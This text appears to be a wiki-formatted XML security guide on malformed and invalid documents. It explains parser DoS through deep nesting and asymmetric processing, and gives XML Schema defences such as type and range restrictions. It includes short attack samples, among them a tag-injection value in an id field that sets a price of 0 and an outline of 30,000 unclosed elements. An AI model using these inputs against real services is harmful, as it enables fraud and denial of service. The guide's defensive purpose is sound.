The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one new, empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it offers a very limited set of restrictions compared to those available in other schema languages such as XML Schema. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document follows this definition. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically this type of element should be restricted to a maximum number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since a DTD cannot express specific restrictions (such as a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
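&lt;br /&gt;
As a hedged sketch of how another schema language could express these limits, the following XML Schema describes the same &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt; document. The specific bounds (a &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; of 1 to 256 characters and an &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; from 0 to 150) are illustrative assumptions and should be adapted to the application:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;!-- Assumed bound: names longer than 256 characters are rejected --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:minLength value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;!-- Assumed range: a one-million-digit age falls outside 0 to 150 --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;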
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining it as a string that will later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced for the element, which suggests that the information was tested by application code rather than against the proposed sample schema.&lt;br /&gt;
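&lt;br /&gt;
Returning to the hexadecimal case mentioned at the start of this section, a minimal sketch of a dedicated type could look like the following. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the size of 32 octets are hypothetical; &amp;lt;tt&amp;gt;xs:hexBinary&amp;lt;/tt&amp;gt; is a built-in XML Schema type, and its &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets (pairs of hexadecimal digits) rather than characters:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- hexBinary already rejects anything that is not pairs of hex digits --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Assumed size: exactly 32 octets, that is, 64 hexadecimal digits --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;32&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;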
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, the calculation might produce a negative total on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
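&lt;br /&gt;
One way to express that correction is sketched below. The upper bound of 1000 is an assumed business limit added for illustration; it is not part of the original example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- positiveInteger excludes zero and all negative values --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Assumed business limit, not part of the original example --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With a definition along these lines, a document carrying a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;-1&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt; fails validation before &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt; is ever computed.&lt;br /&gt;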
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. Some XML Schema data types exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If the schema instead uses a data type that admits zero, a zero denominator may still reach the application and trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; set to Infinity or NaN is rejected during validation, so these values cannot trigger errors in the application. If those values were allowed, an attacker could exploit this issue.&lt;br /&gt;
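&lt;br /&gt;
The &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; type can be narrowed further when the application deals with prices. The following fragment is a sketch under two assumptions that do not come from the original example: prices are never negative, and they carry at most two decimal places:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;price&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- decimal has no INF, -INF or NaN in its value space --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:decimal&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Assumed rules: no negative prices, at most two decimal places --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:fractionDigits value=&amp;quot;2&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;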
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a specific length (for example, 8), the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet can specify it as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
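&lt;br /&gt;
Length facets apply to strings; for numeric types the comparable facets are &amp;lt;tt&amp;gt;minInclusive&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;minExclusive&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;maxExclusive&amp;lt;/tt&amp;gt;. As a sketch, assuming a hypothetical &amp;lt;tt&amp;gt;percentage&amp;lt;/tt&amp;gt; element whose valid values run from 0 to 100:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;percentage&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Assumed valid range for this hypothetical element: 0 to 100 --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
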